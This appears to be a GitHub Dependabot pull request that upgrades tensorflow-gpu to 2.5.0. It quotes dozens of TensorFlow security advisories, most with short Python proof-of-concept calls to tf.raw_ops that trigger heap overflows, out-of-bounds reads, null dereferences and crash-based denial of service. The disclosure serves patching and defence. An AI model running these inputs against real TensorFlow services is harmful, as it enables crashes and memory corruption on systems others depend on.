This is because the implementation only validates that the total number of pixels in the image does not overflow. Thus, an attacker can send an empty matrix for encoding. However, if the tensor is empty, then the associated buffer is nullptr. Hence, when calling png::WriteImageToBuffer, the first argument (i.e., image.flat().data()) is NULL. This then triggers the CHECK_NOTNULL in the first line of png::WriteImageToBuffer.

template 
bool WriteImageToBuffer(
    const void* image, int width, int height, int row_bytes, int num_channels,
    int channel_bits, int compression, T* png_string,
    const std::vector &gt;* metadata) {
  CHECK_NOTNULL(image);
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Invalid validation in SparseMatrixSparseCholesky

Impact

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky:

import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)
tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in DrawBoundingBoxes

Impact

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes:

import tensorflow as tf
images = tf.fill([53, 0, 48, 1], 0.)
boxes = tf.fill([53, 31, 4], 0.)
boxes = tf.Variable(boxes)
boxes[0, 0, 0].assign(3.90621)
tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

This is because the implementation uses CHECK_* assertions instead of OP_REQUIRES to validate user controlled inputs. Whereas OP_REQUIRES allows returning an error condition back to the user, the CHECK_* macros result in a crash if the condition is false, similar to assert.

const int64 max_box_row_clamp = std::min(max_box_row, height - 1);
... 
CHECK_GE(max_box_row_clamp, 0);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap out of bounds read in RaggedCross

Impact

An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross:

import tensorflow as tf
ragged_values = []
ragged_row_splits = []
sparse_indices = []
sparse_values = []
sparse_shape = []
dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64)
dense_inputs = [dense_inputs_elem]
input_order = "R"
hashed_output = False
num_buckets = 0
hash_key = 0
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in QuantizedMul

Impact

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization:

import tensorflow as tf
x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
min_x = tf.constant([], dtype=tf.float32)
max_x = tf.constant([], dtype=tf.float32)
min_y = tf.constant([], dtype=tf.float32)
max_y = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

This is because the implementation assumes that the 4 arguments are always valid scalars and tries to access the numeric value directly:

const float min_x = context-&gt;input(2).flat()(0);
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in SparseConcat

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat:

import tensorflow as tf
import numpy as np
indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64)
indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.zeros([0], dtype=tf.int64)
values_2 = tf.zeros([0], dtype=tf.int64)
values = [values_1, values_2]
shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64)
shape_2 = tf.zeros([9], dtype=tf.int64)
shapes = [shape_1, shape_2]
tf.raw_ops.SparseConcat(indices=indices, values=values, shapes=shapes, concat_dim=2)
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in QuantizedResizeBilinear

Impact

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization:

import tensorflow as tf
images = tf.constant([], shape=[0], dtype=tf.qint32)
size = tf.constant([], shape=[0], dtype=tf.int32)
min = tf.constant([], dtype=tf.float32)
max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

This is because the implementation assumes that the 2 arguments are always valid scalars and tries to access the numeric value directly:

const float in_min = context-&gt;input(2).flat()(0);
const float in_max = context-&gt;input(3).flat()(0);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in QuantizedReshape

Impact

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization:

import tensorflow as tf
tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

This is because the implementation assumes that the 2 arguments are always valid scalars and tries to access the numeric value directly:

const auto&amp; input_min_float_tensor = ctx-&gt;input(2);
...
const float input_min_float = input_min_float_tensor.flat()(0);
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by zero in Conv2DBackpropFilter

Impact

An attacker can cause a division by zero to occur in Conv2DBackpropFilter:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 1, 1, 1],
use_cudnn_on_gpu=False,
padding='SAME',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Segfault in tf.raw_ops.ImmutableConst

Impact

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars.

&gt;&gt;&gt; import tensorflow as tf
&gt;&gt;&gt; tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt")
...
Segmentation fault

Patches

We have patched the issue in 4f663d4b8f0bec1b48da6fa091a7d29609980fa4 and will release TensorFlow 2.5.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Workarounds

If using tf.raw_ops.ImmutableConst in code, you can prevent the segfault by inserting a filter for the dtype argument.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in Conv2DBackpropFilter

Impact

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter:

import tensorflow as tf
input_tensor = tf.constant([386.078431372549, 386.07843139643234],
shape=[1, 1, 1, 2], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1],
dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 49, 1],
use_cudnn_on_gpu=True,
padding='VALID',
explicit_paddings=[],
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in StringNGrams

Impact

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams:

import tensorflow as tf
separator = b'\x02\x00'
ngram_widths = [7, 6, 11]
left_pad = b'\x7f\x7f\x7f\x7f\x7f'
right_pad = b'\x7f\x7f\x25\x5d\x53\x74'
pad_width = 50
preserve_short_sequences = True
l = ['', '', '', '', '', '', '', '', '', '', '']
data = tf.constant(l, shape=[11], dtype=tf.string)
l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Null pointer dereference in StringNGrams

Impact

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams:

import tensorflow as tf
data=tf.constant([''] * 11, shape=[11], dtype=tf.string)
splits = [0]*115
splits.append(3)
data_splits=tf.constant(splits, shape=[116], dtype=tf.int64)
tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss',
ngram_widths=[7,6,11],
left_pad='ABCDE', right_pad=b'ZYXWVU',
pad_width=50, preserve_short_sequences=True)

This is because the implementation does not fully validate the data_splits argument. This would result in ngrams_data to be a null pointer when the output would be computed to have 0 or negative size.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in CTCGreedyDecoder

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder:

import tensorflow as tf
inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)
sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)
merge_repeated = False
tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

This is because the implementation has a CHECK_LT inserted to validate some invariants. When this condition is false, the program aborts, instead of returning a valid error to the user. This abnormal termination can be weaponized in denial of service attacks.

Patches

We have patched the issue in GitHub commit ea3b43e98c32c97b35d52b4c66f9107452ca8fb2.

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in SparseTensorToCSRSparseMatrix

Impact

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices:

import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([0.0], dtype=np.float32)
dense_shape = [0, 0]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)

This is because the implementation does a double redirection to access an element of an array allocated on the heap:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedBiasAdd

Impact

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
bias = tf.constant([], shape=[0], dtype=tf.quint8)
min_input = tf.constant(-10.0, dtype=tf.float32)
max_input = tf.constant(-10.0, dtype=tf.float32)
min_bias = tf.constant(-10.0, dtype=tf.float32)
max_bias = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input,
max_input=max_input, min_bias=min_bias,
max_bias=max_bias, out_type=tf.qint32)

This is because the implementation of the Eigen kernel does a division by the number of elements of the smaller input (based on shape) without checking that this is not zero:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in FractionalAvgPool

Impact

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool:

import tensorflow as tf
value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32)
pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0]
pseudo_random = False
overlapping = False
deterministic = False
seed = 0
seed2 = 0
tf.raw_ops.FractionalAvgPool(
value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

This is because the implementation computes a divisor quantity by dividing two user controlled values:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap out of bounds in QuantizedBatchNormWithGlobalNormalization

Impact

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:

import tensorflow as tf
t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8)
t_min = tf.constant([], shape=[0], dtype=tf.float32)
t_max = tf.constant([], shape=[0], dtype=tf.float32)
m = tf.constant([1], shape=[1], dtype=tf.quint8)
m_min = tf.constant([], shape=[0], dtype=tf.float32)
m_max = tf.constant([], shape=[0], dtype=tf.float32)
v = tf.constant([1], shape=[1], dtype=tf.quint8)
v_min = tf.constant([], shape=[0], dtype=tf.float32)
v_max = tf.constant([], shape=[0], dtype=tf.float32)
beta = tf.constant([1], shape=[1], dtype=tf.quint8)
beta_min = tf.constant([], shape=[0], dtype=tf.float32)
beta_max = tf.constant([], shape=[0], dtype=tf.float32)
gamma = tf.constant([1], shape=[1], dtype=tf.quint8)
gamma_min = tf.constant([], shape=[0], dtype=tf.float32)
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedAdd

Impact

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd:

import tensorflow as tf
x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8)
y = tf.constant([], shape=[2, 0], dtype=tf.quint8)
min_x = tf.constant(10.723421015884028)
max_x = tf.constant(15.19578006631113)
min_y = tf.constant(-5.539003866682977)
max_y = tf.constant(42.18819949559947)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

This is because the implementation computes a modulo operation without validating that the divisor is not zero.

</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedBatchNormWithGlobalNormalization

Impact

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:

import tensorflow as tf
t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, dtype=tf.float32)
beta_max = tf.constant(-10.0, dtype=tf.float32)
gamma = tf.constant([], shape=[0], dtype=tf.quint8)
gamma_min = tf.constant(-10.0, dtype=tf.float32)
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-failure in UnsortedSegmentJoin

Impact

An attacker can cause a denial of service by controlling the values of num_segments tensor argument for UnsortedSegmentJoin:

import tensorflow as tf
inputs = tf.constant([], dtype=tf.string)
segment_ids = tf.constant([], dtype=tf.int32)
num_segments = tf.constant([], dtype=tf.int32)
separator = ''
tf.raw_ops.UnsortedSegmentJoin(
inputs=inputs, segment_ids=segment_ids,
num_segments=num_segments, separator=separator)

This is because the implementation assumes that the num_segments tensor is a valid scalar:

const Tensor&amp; num_segments_tensor = context-&gt;input(2);
</tr></table> 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

OOB read in MatrixTriangularSolve

Impact

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails:

void ValidateInputTensors(OpKernelContext* ctx, const Tensor&amp; in0,
                            const Tensor&amp; in1) override {
  OP_REQUIRES(
      ctx, in0.dims() &gt;= 2,
      errors::InvalidArgument("In[0] ndims must be &gt;= 2: ", in0.dims()));
OP_REQUIRES(
ctx, in1.dims() &gt;= 2,
errors::InvalidArgument("In[0] ndims must be &gt;= 2: ", in1.dims()));
}
void Compute(OpKernelContext* ctx) override {
const Tensor&amp; in0 = ctx-&gt;input(0);
const Tensor&amp; in1 = ctx-&gt;input(1);
ValidateInputTensors(ctx, in0, in1);
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in FusedBatchNorm

Impact

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm:

import tensorflow as tf
x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32)
scale = tf.constant([], shape=[0], dtype=tf.float32)
offset = tf.constant([], shape=[0], dtype=tf.float32)
mean = tf.constant([], shape=[0], dtype=tf.float32)
variance = tf.constant([], shape=[0], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap OOB in QuantizeAndDequantizeV3

Impact

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3:

import tensorflow as tf
tf.raw_ops.QuantizeAndDequantizeV3(
input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30],
signed_input=False, range_given=False, narrow_range=False, axis=3)

This is because the implementation does not validate the value of user supplied axis attribute before using it to index in the array backing the input argument:

const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);

Patches

We have patched the issue in GitHub commit 99085e8ff02c3763a0ec2263e44daec416f6a387.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Incomplete validation in SparseAdd

Impact

Incomplete validation in SparseAdd results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data:

import tensorflow as tf
a_indices = tf.zeros([10, 97], dtype=tf.int64)
a_values = tf.zeros([10], dtype=tf.int64)
a_shape = tf.zeros([0], dtype=tf.int64)
b_indices = tf.zeros([0, 0], dtype=tf.int64)
b_values = tf.zeros([0], dtype=tf.int64)
b_shape = tf.zeros([0], dtype=tf.int64)
thresh = 0
tf.raw_ops.SparseAdd(a_indices=a_indices,
a_values=a_values,
a_shape=a_shape,
b_indices=b_indices,
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow and undefined behavior in FusedBatchNorm

Impact

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow:

import tensorflow as tf
x = tf.zeros([10, 10, 10, 6], dtype=tf.float32)
scale = tf.constant([0.0], shape=[1], dtype=tf.float32)
offset = tf.constant([0.0], shape=[1], dtype=tf.float32)
mean = tf.constant([0.0], shape=[1], dtype=tf.float32)
variance = tf.constant([0.0], shape=[1], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
x=x, scale=scale, offset=offset, mean=mean, variance=variance,
epsilon=epsilon, exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training)
</tr></table>

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in MaxPoolGrad

Impact

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf
orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.MaxPoolGrad(
orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize,
strides=strides, padding=padding, explicit_paddings=[])

The implementation fails to validate that indices used to access elements of input/output arrays are valid:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in FractionalAvgPoolGrad

Impact

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf
orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64)
out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64)
row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
tf.raw_ops.FractionalAvgPoolGrad(
orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop,
row_pooling_sequence=row_pooling_sequence,
col_pooling_sequence=col_pooling_sequence, overlapping=False)

The implementation fails to validate that the pooling sequence arguments have enough elements as required by the out_backprop tensor shape.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in AvgPool3DGrad

Impact

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf
orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32)
grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32)
ksize = [1, 1, 1, 1, 1]
strides = [1, 1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.AvgPool3DGrad(
orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides,
padding=padding)

The implementation assumes that the orig_input_shape and grad tensors have similar first and last dimensions but does not check that this assumption is validated.

Patches

... (truncated)

Affected versions: < 2.1.4


Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
  • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
  • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
  • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
  • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language
  • @dependabot badge me will comment on this PR with code to add a "Dependabot enabled" badge to your readme

Additionally, you can set the following in your Dependabot dashboard:

  • Update frequency (including time of day and day of week)
  • Pull request limits (per update run and/or open at any time)
  • Out-of-range updates (receive only lockfile updates, if desired)
  • Security updates (receive only security updates, if desired)

Bumps tensorflow-gpu from 1.13.2 to 2.5.0. **This update includes security fixes.**

Signed-off-by: dependabot-preview[bot] <[email protected]>
@dependabot-preview dependabot-preview bot added dependencies Pull requests that update a dependency file security Pull requests that address a security vulnerability labels Jun 8, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
dependencies Pull requests that update a dependency file security Pull requests that address a security vulnerability
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants